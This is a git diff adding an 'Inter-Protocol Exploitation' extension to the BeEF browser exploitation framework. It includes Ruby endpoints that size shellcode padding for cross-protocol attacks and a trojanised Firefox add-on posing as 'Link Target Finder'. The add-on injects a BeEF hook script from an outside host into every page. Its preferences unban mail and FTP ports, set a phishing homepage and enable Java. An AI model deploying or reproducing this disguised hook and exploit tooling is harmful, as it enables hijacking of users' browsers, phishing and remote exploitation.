diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
new file mode 100644
index 000000000..28b9dde4b
--- /dev/null
+++ b/extensions/ipec/config.yaml
@@ -0,0 +1,21 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ extension:
+ ipec:
+ enable: true
+ name: 'Inter-Protocol Exploitation'
+ authors: ["antisnatchor"]
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
new file mode 100644
index 000000000..b8464e0d6
--- /dev/null
+++ b/extensions/ipec/extension.rb
@@ -0,0 +1,60 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+
+ #todo remove it from here:
+ # Handlers
+ #require 'extensions/ipec/fingerprinter'
+ #require 'extensions/ipec/launcher'
+ require 'extensions/ipec/junk_calculator'
+
+ module Ipec
+ extend BeEF::API::Extension
+
+ @short_name = 'Ipec'
+ @full_name = 'Inter-Protocol Exploitation'
+ @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
+
+ module RegisterIpecRestHandler
+ def self.mount_handler(server)
+ server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
+ end
+ end
+
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
+
+ #todo remove it from here, and make it dynamic.
+ BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator("imapeudora1")
+ end
+end
+end
+
+# Models
+# todo: to be used when we'll have more IPEC exploits
+#require 'extensions/ipec/models/ipec_exploits'
+#require 'extensions/ipec/models/ipec_exploits_run'
+
+# RESTful api endpoints
+require 'extensions/ipec/rest/ipec'
+
+
+
+
+
+
+
+
diff --git a/extensions/ipec/files/LinkTargetFinder.xpi b/extensions/ipec/files/LinkTargetFinder.xpi
new file mode 100644
index 000000000..3fadfa9c2
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder.xpi differ
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome.manifest b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
new file mode 100644
index 000000000..f9ad9ab4c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
@@ -0,0 +1,8 @@
+content linktargetfinder chrome/content/
+content linktargetfinder chrome/content/ contentaccessible=yes
+overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
+
+locale linktargetfinder en-US locale/en-US/
+
+skin linktargetfinder classic/1.0 skin/
+style chrome://global/content/customizeToolbar.xul chrome://linktargetfinder/skin/skin.css
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
new file mode 100644
index 000000000..5b63810a8
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
@@ -0,0 +1,22 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
new file mode 100644
index 000000000..8c86ef860
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -0,0 +1,37 @@
+var linkTargetFinder = function () {
+ var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
+ return {
+ init : function () {
+ gBrowser.addEventListener("load", function () {
+ //todo change the Extension name
+ var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
+ if (autoRun) {
+ linkTargetFinder.run();
+ }
+ }, false);
+ },
+
+ run : function () {
+ var head = content.document.getElementsByTagName("head")[0];
+
+ // add the BeEF hook -- start
+ var s = content.document.createElement('script');
+ s.type='text/javascript';
+ s.src='http://192.168.0.2:3000/hook.js';
+ head.appendChild(s);
+
+ //setTimeout cannot be used (looks like is ignored).
+ // beef_init if called manually from the console, works perfectly.
+
+ // adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
+ // John Wilander suggestions. we might leave it there anyway.
+ //alert(1);
+ //setTimeout(function(){beef_init()}, 5000);
+ //alert(3);
+
+ // add the BeEF hook -- end
+
+ }
+ };
+}();
+window.addEventListener("load", linkTargetFinder.init, false);
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
new file mode 100644
index 000000000..ea0cfd8e3
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
@@ -0,0 +1,31 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
new file mode 100644
index 000000000..cbe9a6dd9
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -0,0 +1,21 @@
+// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
+// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
+pref("extensions.linktargetfinder.autorun", false);
+
+// PortBanning override
+pref("network.security.ports.banned.override", "20,21,22,25,110,143");
+
+// home page is a phishing page create with BeEF Social Engineering extension,
+// the BeEF hook is added.
+pref("browser.startup.homepage.override", "http://www.binc.com");
+pref("browser.newtab.url", "http://www.binc.com");
+pref("browser.startup.page.override", "1");
+
+//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
+// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
+// new: Firefox/15.0.1
+pref("general.useragent.override", "Firefox/15.0.1");
+
+// enable Java
+pref("security.enable_java", true);
+
diff --git a/extensions/ipec/files/LinkTargetFinder/install.rdf b/extensions/ipec/files/LinkTargetFinder/install.rdf
new file mode 100644
index 000000000..e7019cd8c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/install.rdf
@@ -0,0 +1,23 @@
+
+
+
+
+ linktargetfinder@robertnyman.com
+ Link Target Finder
+ 1.0
+ 2
+ Robert Nyman
+ Finds links that have a target attribute
+ http://www.robertnyman.com/
+ chrome://linktargetfinder/content/options.xul
+
+
+
+ {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
+ 2.0
+ 23.0
+
+
+
+
diff --git a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
new file mode 100644
index 000000000..a42a829bf
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
new file mode 100644
index 000000000..c82d15f49
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -0,0 +1,12 @@
+#link-target-finder-toolbar-button {
+ list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
+}
+
+#link-target-finder-status-bar-icon {
+ width: 83px;
+ margin: 0 5px;
+}
+
+.link-target-finder-selected {
+ outline: 2px solid red !important;
+}
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
new file mode 100644
index 000000000..7f6c06afe
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png differ
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
new file mode 100644
index 000000000..d1475a33b
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png differ
diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
new file mode 100644
index 000000000..718e40de2
--- /dev/null
+++ b/extensions/ipec/junk_calculator.rb
@@ -0,0 +1,40 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Extension
+ module Ipec
+ class JunkCalculator
+ include Singleton
+
+ def initialize
+ @binded_sockets = {}
+ @host = BeEF::Core::Configuration.instance.get('beef.http.host')
+ end
+
+ def bind_junk_calculator(name)
+ port = 2000
+ #todo add binded ports to @binded_sockets. Increase +1 port number if already binded
+ #if @binded_sockets[port] != nil
+ #else
+ #end
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
+ @binded_sockets[name] = port
+
+ end
+ end
+ end
+ end
+end
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
new file mode 100644
index 000000000..789fdcf36
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -0,0 +1,37 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Core
+ module Models
+ class IpecExploits
+
+ include DataMapper::Resource
+ #todo: use this table when we'll have a bigger IPEC exploits choice
+ storage_names[:default] = 'extension_ipec_exploits'
+
+ property :id, Serial
+
+ property :name, Text, :lazy => false
+ property :protocol, String, :lazy => false
+ property :os, String, :lazy => false
+
+ has n, :extension_ipec_exploits_run, 'IpecExploitsRun'
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
new file mode 100644
index 000000000..24ebcaa5b
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -0,0 +1,36 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Core
+ module Models
+ class IpecExploitsRun
+
+ include DataMapper::Resource
+ #todo: use this table when we'll have a bigger IPEC exploits choice
+ storage_names[:default] = 'extension_ipec_exploits_run'
+
+ property :id, Serial
+ property :launched, Boolean, :lazy => false
+ property :http_headers, Text, :lazy => false
+ property :junk_size, String, :length => 3, :lazy => false
+
+ belongs_to :ipec_exploits
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
new file mode 100644
index 000000000..00b3eff9a
--- /dev/null
+++ b/extensions/ipec/rest/ipec.rb
@@ -0,0 +1,88 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+module BeEF
+ module Extension
+ module Ipec
+ class IpecRest < BeEF::Core::Router::Router
+
+ before do
+ # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
+ # They need to be called remotely from a hooked browser.
+
+ #error 401 unless params[:token] == config.get('beef.api_token')
+ #halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+ headers 'Content-Type' => 'application/json; charset=UTF-8',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ # Determine the exact size of the cross-domain request HTTP headers.
+ # Needed to calculate junk properly and prevent errors.
+ # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
+ # todo: the core of this method should be moved to ../junk_calculator.rb
+ get '/junk/:name' do
+ socket_name = params[:name]
+ halt 401 if not BeEF::Filters.alphanums_only?(socket_name)
+ socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
+ halt 404 if socket_data == nil
+
+ if socket_data.include?("\r\n\r\n")
+ result = Hash.new
+
+ headers = socket_data.split("\r\n\r\n").first
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
+ print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
+ # CRLF -> 4 bytes
+ result['size'] = headers.size + 4
+
+ headers.split("\r\n").each do |line|
+ if line.include?("Host")
+ result['host'] = line.size + 2
+ end
+ if line.include?("Content-Type")
+ result['contenttype'] = line.size + 2
+ end
+ if line.include?("Referer")
+ result['referer'] = line.size + 2
+ end
+ end
+ result.to_json
+ else
+ print_error "[IPEC] Looks like there is no CRLF in the data received!"
+ halt 404
+ end
+ end
+
+
+ # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
+ # If you want to modify the pref.js file, do the following to re-pack the extension:
+ # $cd firefox_extension_directory
+ # $zip -r ../result-name.xpi *
+ get '/ff_extension' do
+ response['Content-Type'] = "application/x-xpinstall"
+ ff_extension = "#{File.expand_path('../../../ipec/files', __FILE__)}/LinkTargetFinder.xpi"
+ print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
+ send_file "#{ff_extension}",
+ :type => 'application/x-xpinstall',
+ :disposition => 'inline'
+ end
+
+ end
+ end
+ end
+end
\ No newline at end of file